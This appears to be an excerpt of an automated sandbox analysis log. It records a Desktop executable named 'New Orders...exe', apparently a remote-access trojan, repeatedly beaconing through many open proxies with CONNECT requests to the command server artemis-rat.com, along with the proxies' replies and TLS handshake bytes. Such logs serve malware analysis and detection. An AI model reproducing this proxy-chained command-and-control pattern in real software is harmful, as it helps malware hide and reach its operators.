                                                                                        Mar 11, 2024 16:16:43.067610979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        857192.168.2.952565193.239.58.9280817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.072325945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        858192.168.2.95136672.210.221.22341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.076633930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        859192.168.2.952561116.199.168.141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.076831102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.945209980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        860192.168.2.95153944.226.167.10210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.076993942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.665066004 CET65INHTTP/1.1 200 Connection Established
                                                                                        Content-Type: text/plain


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        861192.168.2.952637104.21.218.103807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.078633070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.233022928 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        862192.168.2.952644104.20.178.166807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.078712940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.234515905 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        863192.168.2.951405173.212.209.49395227672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.078799963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.106539965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.133057117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.132894993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.133361101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:19.133182049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:31.132514000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:55.132509947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:43.216442108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        864192.168.2.951505194.4.50.91123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.081711054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        865192.168.2.950178189.240.60.16390907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.082086086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.352879047 CET72INHTTP/1.1 200 Connection established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        866192.168.2.951445212.127.93.18580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.083415031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        867192.168.2.95265344.226.167.10231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.083632946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.278354883 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        868192.168.2.95258872.210.252.13741457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.084119081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        869192.168.2.95150165.109.211.10131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.087663889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.962101936 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        870192.168.2.95152572.206.181.105649357672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.089251995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        871192.168.2.952633107.175.37.178430297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.106185913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        872192.168.2.95265267.43.236.2052397672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.109560013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.541687965 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        873192.168.2.9525745.32.88.13080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.166855097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.590063095 CET72INHTTP/1.1 200 Connection established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        874192.168.2.950265162.214.225.223405367672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.167905092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.242103100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.242758036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.242400885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.241974115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:31.241892099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:19.257577896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        875192.168.2.950156212.110.188.222344117672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.168335915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.242089987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.366404057 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        876192.168.2.95258739.108.227.108807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.168886900 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:43.534388065 CET767INHTTP/1.1 403 Forbidden
                                                                                        Server: Beaver
                                                                                        Cache-Control: no-cache
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 635
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        877192.168.2.95166144.226.167.102807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.168895006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.359330893 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:43.372347116 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 5a 16 a5 a0 f0 93 d7 d8 90 b9 e7 1b d6 2b 68 5c 70 dd f5 09 b4 e1 75 3d 2f a1 86 80 72 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e Z+h\pu=/r*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:43.562347889 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 6e 1a 9b 89 2b 7e a2 f5 57 ff 03 41 c9 72 65 d4 6b 16 a7 78 8b 29 a9 ed 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =9n+~WArekx)DOWNGRD0000*H010Uartemis-rat.com0240311150904Z260311150904Z010Uartemis-rat.com0"0*H0$[GmF<Q
                                                                                        Mar 11, 2024 16:16:43.667886972 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 a9 7d cc ff cf d9 5d 99 4d 0a 70 95 9e 26 5c 28 51 6a 08 f7 0c b6 a5 c1 60 bd a8 27 77 f3 5d 73 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 ae 98 78 13 43 78 24 89 fc 38 74 be ca b0 30 09 40 95 7a aa 2f
                                                                                        Data Ascii: %! }]Mp&\(Qj`'w]s(xCx$8t0@z/:N5S
                                                                                        Mar 11, 2024 16:16:43.859510899 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 1a e7 be 92 7e 1d 8c c7 3c 5e 80 22 41 67 be 96 1b 93 6e 28 11 03 33 1d d7 4a ac 2e e6 a4 18 6e 86 33 e7 e7 e9 b0 f2 b3
                                                                                        Data Ascii: (~<^"Agn(3J.n3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        878192.168.2.952602121.66.198.7641457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.168952942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        879192.168.2.951520167.71.5.8331287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.168975115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.242103100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
